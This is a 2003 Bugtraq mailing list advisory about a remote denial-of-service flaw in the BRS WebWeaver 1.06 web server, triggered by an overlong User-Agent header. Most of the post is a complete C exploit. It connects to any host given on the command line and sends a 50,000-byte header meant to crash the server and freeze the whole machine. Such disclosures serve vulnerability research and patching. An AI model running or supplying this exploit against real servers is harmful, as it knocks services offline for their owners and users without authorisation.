lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 1 Nov 2003 12:03:33 +0300
From: d4rkgr3y <d4rk@...uritylab.ru>
To: bugtraq@...urityfocus.com
Subject: BRS WebWeaver 1.06 remote DoS vulnerability


/**********************************************************
*
*               m00 security advistory #004
*
*        BRS WebWeaver remote DoS vulnerability
*
*                    www.m00security.org
*
************************************************************/

---------------------------------
Product: BRS WebWeaver
Version: 1.06 and bellow
OffSite: www.brswebweaver.com
---------------------------------

Overview:

BRS WebWeaver is an HTTP Server with support for
CGI, ISAPI, SSI, IP Address based security, Realm
based security, configurable users and groups, as well
as basic HTTP capabilities. 

Problem description:

BRS WebWeaver httpd crashes and freeze the whole system,
when it get the request that contatins long string within
`User-Agent` field. The vulnarability doesn't seems
exploitable, except DoS.

Exploit:
Lame cpp exploit code that demonstrate possibility of
remote Denial-of-Service attack against BRS WebWeaver.

/*
 *  BRS WebWeaver v.1.06 remote DoS exploit
 *
 * -d4rkgr3y [d4rk@...uritylab.ru]
 *
 */

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>

#define port 80

main(int argc, char **argv) {
	struct hostent *hs;
	struct sockaddr_in sock;
	int sockfd, i;
	const c = 50000;
	char request[50150] =
		"GET /m00-r0cz HTTP/1.0\n"
		"Accept: */*\n"
		"Accept-Language: jp\n"
		"Accept-Encoding: gzip, deflate\n"
		"Host: m00security.org\n"
		"User-Agent: ";
	printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");

	if (argc!=2){
		printf("usage\n %s hostname\n\n",argv[0]);
		exit(1);
	}

	//memset((request+98),0x41,c);
	memset((request+strlen(request)),0x41,c);
	/* l33t ;] */
	request[strlen(request)] = 0x0a;
	request[strlen(request)] = 0x43;
	request[strlen(request)] = 0x6f;
	request[strlen(request)] = 0x6e;
	request[strlen(request)] = 0x6e;
	request[strlen(request)] = 0x65;
	request[strlen(request)] = 0x63;
	request[strlen(request)] = 0x74;
	request[strlen(request)] = 0x69;
	request[strlen(request)] = 0x6f;
	request[strlen(request)] = 0x6e;
	request[strlen(request)] = 0x3a;
	request[strlen(request)] = 0x20;
	request[strlen(request)] = 0x4b;
	request[strlen(request)] = 0x65;
	request[strlen(request)] = 0x65;
	request[strlen(request)] = 0x70;
	request[strlen(request)] = 0x2d;
	request[strlen(request)] = 0x41;
	request[strlen(request)] = 0x6c;
	request[strlen(request)] = 0x69;
	request[strlen(request)] = 0x76;
	request[strlen(request)] = 0x65;
	request[strlen(request)] = 0x0a;
	request[strlen(request)] = 0x0a;

	bzero(&sock, sizeof(sock));
	sock.sin_family = AF_INET;
	sock.sin_port = htons(port);
	if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
		if ((hs=gethostbyname(argv[1]))==NULL) {
			printf("damn");
			exit(1);
		}
		printf("~ Host resolved.\n");
		sock.sin_family = hs->h_addrtype;
		memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
	}
	if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
		perror("damn");  exit(0);
	}

	if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
		perror("damn"); exit(0);
	}
	printf("~ Socket connected\n");
	printf("~ Sending evil code... ");
	write(sockfd,request,strlen(request));
	printf("done\n\n");
	close(sockfd);
}
/* m00 */

(c) m00 Security / d4rkgr3y [d4rk@...uritylab.ru]




Powered by blists - more mailing lists